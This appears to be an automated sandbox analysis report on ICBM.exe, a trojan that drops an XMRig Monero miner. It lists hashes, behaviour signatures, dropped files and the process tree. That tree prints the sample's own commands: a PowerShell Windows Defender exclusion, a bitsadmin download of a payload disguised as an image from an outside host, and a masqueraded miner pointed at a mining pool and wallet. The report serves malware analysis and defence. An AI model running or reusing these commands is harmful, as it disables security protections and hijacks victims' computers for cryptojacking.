Overview

overview

10

Static

static

3

ICBM.exe

windows7-x64

1

ICBM.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    95s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01-11-2024 06:48

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ICBM.exe

  • Size

    2.4MB

  • MD5

    3dfd4a0c8e6c5568c338777ccc6fc37e

  • SHA1

    58ad52f683e605c371fbe493b077b4c3ebbe24e2

  • SHA256

    8c7c91623a101b7607bf30acb8f6794411f366c538ba807687aaefba831754f4

  • SHA512

    9a7b47107bbfbaa0a1e1377a35d5b9caf448ca1645a0c51807d81327ec5d6a5eb7c7b606ba54abbcfc2677c2ea7a414176ec26eda584a71b30c68330e64204b6

  • SSDEEP

    49152:g5B1OWKqu3Keth/qx5yzjTv9u1KRrbY2mdBO0XRlh1:A/UytDdT1

Score
10/10
xmrigdropperevasionexecutionminertrojan

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 2 IoCs
    evasiontrojan
  • XMRig Miner payload 2 IoCs
    miner
  • Xmrig family
    xmrig
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Download via BitsAdmin 1 TTPs 1 IoCs
    dropper
  • Executes dropped EXE 1 IoCs
  • Drops file in System32 directory 4 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Modifies data under HKEY_USERS 46 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 28 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ICBM.exe
    "C:\Users\Admin\AppData\Local\Temp\ICBM.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4028
    • C:\Windows\system32\sc.exe
      "sc" start my_system_service
      2⤵
      • Launches sc.exe
      PID:3512
  • C:\Users\Admin\AppData\Local\Temp\ICBM.exe
    C:\Users\Admin\AppData\Local\Temp\ICBM.exe
    1⤵
    • Modifies Windows Defender Real-time Protection settings
    • Drops file in System32 directory
    • Drops file in Windows directory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1016
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -Command "Add-MpPreference -ExclusionPath \"C:\Windows\SystemTemp\delete_clsids.ps1\""
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3156
    • C:\Windows\system32\bitsadmin.exe
      "bitsadmin" /transfer Explorers /download /priority FOREGROUND https://dl.imgdrop.io/file/aed8b140-8472-4813-922b-7ce35ef93c9e/2024/10/31/packedcar47c3772120423724.png C:\Windows\img.png
      2⤵
      • Download via BitsAdmin
      PID:3000
    • C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe
      2⤵
        PID:4292
      • C:\Windows\System32\msvchost.exe
        C:\Windows\System32\msvchost.exe -o xmr-eu2.nanopool.org:14433 -u 49QjJy47SU1MGFX7Rep7TQUkGUvvTRqSx4HhzqBgMNwtRvxsXMd98sFZLULDV61ncxVr5kazj9asqctBxy6hWm462wGcBQT --tls --coin monero
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:3964

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\IT\service_log.txt
      Filesize

      469B

      MD5

      bd9bc54eaa4ca999367eb47deab19396

      SHA1

      555891baa37964aa62177ee32c8c75d4d0e260e7

      SHA256

      a08bdb08d0cd849e6fe18f71f07a07fcce4fefa461100a577219a40bec06748a

      SHA512

      5a0083025cd09f56ab9c2847b6f4388f2ebae4c8263e174e8ae2252ba792c3e2295be84a7701e0b339bf2f2f46ec9230de4bb400fbeabf30044428f4fbab6cbb

      Download Submit

    • C:\Windows\System32\msvchost.exe
      Filesize

      6.1MB

      MD5

      7ccbc7378579b787a08a3b7e88474ac7

      SHA1

      63abca64118e7f0b32c3165e442e53143a5679e0

      SHA256

      b58481853cf26dccde549d444ced515f9335415c3bd7ff63abbd49906ebe4b78

      SHA512

      3a9cbcf489eea8f438fc04fc5f714d35659cf089e814cda51e7b778d4bc10c6e72deb04603cf3b20fe7c7295b0fb82c75f8c4b922535fcd3c69072bd8b7a7596

      Download Submit

    • C:\Windows\Temp\__PSScriptPolicyTest_bgqn0w5e.lbl.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • memory/3156-27-0x00000269C3D20000-0x00000269C3D2A000-memory.dmp

      Filesize

      40KB

      Download

    • memory/3156-29-0x00000269DBED0000-0x00000269DBEDA000-memory.dmp

      Filesize

      40KB

      Download

    • memory/3156-13-0x00007FFD50680000-0x00007FFD51141000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3156-24-0x00000269DEB80000-0x00000269DEC35000-memory.dmp

      Filesize

      724KB

      Download

    • memory/3156-25-0x00007FFD50680000-0x00007FFD51141000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3156-23-0x00000269DBEB0000-0x00000269DBECC000-memory.dmp

      Filesize

      112KB

      Download

    • memory/3156-26-0x00007FFD50680000-0x00007FFD51141000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3156-9-0x00000269DBEE0000-0x00000269DBF02000-memory.dmp

      Filesize

      136KB

      Download

    • memory/3156-28-0x00000269DEDA0000-0x00000269DEDBC000-memory.dmp

      Filesize

      112KB

      Download

    • memory/3156-12-0x00007FFD50680000-0x00007FFD51141000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3156-30-0x00000269DEDC0000-0x00000269DEDDA000-memory.dmp

      Filesize

      104KB

      Download

    • memory/3156-31-0x00000269DED80000-0x00000269DED88000-memory.dmp

      Filesize

      32KB

      Download

    • memory/3156-32-0x00000269DED90000-0x00000269DED96000-memory.dmp

      Filesize

      24KB

      Download

    • memory/3156-33-0x00000269DEDE0000-0x00000269DEDEA000-memory.dmp

      Filesize

      40KB

      Download

    • memory/3156-34-0x00007FFD50680000-0x00007FFD51141000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3156-37-0x00007FFD50680000-0x00007FFD51141000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3156-1-0x00007FFD50683000-0x00007FFD50685000-memory.dmp

      Filesize

      8KB

      Download

    • memory/3964-46-0x000001FAF62A0000-0x000001FAF62C0000-memory.dmp

      Filesize

      128KB

      Download